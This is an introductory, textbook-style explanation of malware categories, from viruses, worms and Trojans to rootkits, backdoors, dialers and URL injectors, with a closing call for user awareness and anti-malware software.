Malware is the shortened term for malicious software. Malware is unethical code hackers write to cause harm and destruction. Malware gains access to a system in myriad ways, usually without the consent or knowledge of the user. The most common vectors of this computer contaminant are portable storage devices and Internet communications, like email or social media. A wide range of malware exists, including viruses, worms, Trojan horses, keystroke loggers, spyware, adware, rootkits, logic bombs, trapdoors, backdoors, dialers, URL injectors, and other exploits. The number of unique malicious code examples is astounding. Some recent research of malware attacks has estimated the potential number of unique signatures (strings of code used to detect and identify specific malware, much like a fingerprint) as into the billions. This is a huge increase since Symantec noted more than 17 million unique signatures less than 10 years ago.

Just like a biological virus, a computer virus needs a host object to infect. Most viruses infect files, such as executables; device drivers; dynamic link libraries (DLLs); system files; and sometimes even document, audio, video, and image files. Some viruses infect the boot sector of a storage device, including hard drives, and USB drives. Viruses spread through the actions of users. As users open infected files, the virus spreads to other files. As users send infected files to other systems, the virus spreads there, as well.

Unlike viruses, which spread from file to file, worms spread from system to system. Because human interaction isn’t necessary for propagation, these files can (and do) spread much more quickly than viruses. Today, nearly every threat described as a virus is really a worm. Hackers design worms around specific system flaws. The worm scans other systems for this flaw, and then exploits the flaw to gain access to another victim system. Once hosted on another system, the worm spreads itself by repeating the process. Worms can be carriers to deposit other forms of malicious code as they multiply and spread across networked hosts.

A Trojan horse is actually a mechanism of distribution or delivery more than a specific type of malware. During the Trojan War, the Greeks built a huge, hollow wooden horse; hid warriors inside; delivered the horse statue to the Trojans; and seemingly departed the area. The Trojans took the horse into their citadel and were massacred overnight when the Greek warriors emerged from hiding. The concept refers to an embedded malicious payload within a seemingly benign carrier or host program, a program that the user wanted—such as game or video clip—and intentionally downloaded or copied. Then, when the host program runs the game or video clip, the malware is delivered.

The gimmick of a Trojan is fooling someone (a type of social engineering attack) into accepting the Trojan program as safe. Any program can be converted into a Trojan by embedding malware inside it, in the same way that any food can be poisoned by adding a toxic substance to it. In fact, hackers have specialized tools designed for the express purpose of building Trojan horses called wrappers or Trojan construction kits.

Keystroke loggers record the keyboard activity of a user. Hackers can deposit software keystroke loggers onto a victim’s system through a variety of techniques, including a worm or a Trojan. Once a system is infected, the keystroke logger periodically transmits key logs to the originating hacker through email, File Transfer Protocol (FTP), or instant messaging (IM). Hardware keystroke logger attacks can come through the keyboard cable. These are hard to detect because the device is very small; while often linked to the keyboard cable, it is usually below the desk or behind the computer where users typically would not look.

Spam email is often used to perpetrate phishing attacks where an email appears legitimate or enticing, even if it was never requested, causing the receiver to click on it, thus launching malware into their computer system.

Spyware is an advancement of keystroke logging to monitor and record many other user activities. Spyware varies greatly, but can collect a list of applications launched, URLs visited, email sent and received, chats sent and received, names of all files opened, recording of network activity, periodic screen captures, and even recordings from a microphone or images from a webcam.

Adware infiltrates advertisements. Spyware and adware are often linked together in a symbiosis, because the information learned about a target from spyware helps in selecting materials the adware will push through to the user. Adware can push advertisements as pop-ups, as email messages, or by replacing existing legitimate ads on websites as each is displayed in the browser.

Rootkits are malicious camouflage that function as invisibility shields for anything a hacker wants to hide on a computer. A rootkit acts like a device driver and positions itself between the kernel (the core program of an operating system) and the hardware. From there, the rootkit can selectively hide files on storage devices and keep active processes in memory from being viewable, accessible, or detectible by the OS. Rootkits hide other forms of malware or hacker tools and can include other malware functions in addition to their stealth abilities.

A logic bomb is an electronic land mine. Once a hacker embeds a logic bomb in a system, it remains dormant until a triggering event takes place. The trigger could be a specific time and date, the launching of a program, the typing of a specific keyword, or accessing a specific URL. Once the trigger occurs, the logic bomb springs its malicious event on the unsuspecting user.

Trapdoor and backdoor malware are two terms for the same type of malware. A backdoor or trapdoor program opens an access pathway for a hacker to gain easy access into a compromised system. Backdoor malware is commonly delivered by the Trojan horse method. Unlike malware such as ransomware or a worm, it is most important to the malicious portion of the Trojan to remain hidden. The access could be the creation of a new user account with credentials the hacker has defined; a rogue web, Telnet, or Secure Shell (SSH) server that gives the hacker remote command prompt access; or a source that enables full remote control over the victim’s machine (sometimes just by turning on Remote Desktop on a Windows host). Many other possible trapdoor or backdoor manipulations can grant access to external hackers.

A dialer is a rogue program that automatically dials a modem at a predefined number. Sometimes this process auto-downloads additional malware to the victim system or uploads stolen data from the victim. In other cases, the dialer calls premium rate telephone numbers from the victim system to rack up massive long-distance charges. If the user normally connects to the Internet over a dial-up link, the dialer could dial a rogue proxy site instead of the Internet service provider (ISP). This site would act as a man-in-the-middle and then eavesdrop on all communications.

URL injectors replace URLs in HTTP GET requests for alternative addresses. These injected URLs cause a different webpage to appear in the browser than the one requested by the user’s click. These replaced webpages could present advertisement sites, generate traffic to falsify search engine optimization (SEO), or lead to spoofed sites.

Exploits are any form of malware designed to take advantage of a flaw in programming, timing, communication, or storage. Hackers often embed exploits into other forms of malware to assist in infection and distribution. Exploits also exist independently, usually as tools employed by hackers to wage attacks, cause damage, and perform intrusions.

Malware is spread through the same communication channels as legitimate, benign data. The difference is that hackers design malware to cause distress and destruction. A growing area of risk for the spread of malware is mobile code. Mobile code is software that hackers write for easy distribution over communications networks, such as the Internet and mobile phone networks. Hackers design mobile code to download to a host, and then execute on the host. Malware, under the guise of mobile code, is spreading more rapidly than ever. The general population—and even IT professionals—need to be more aware, use proper precautions, and use anti-malware applications.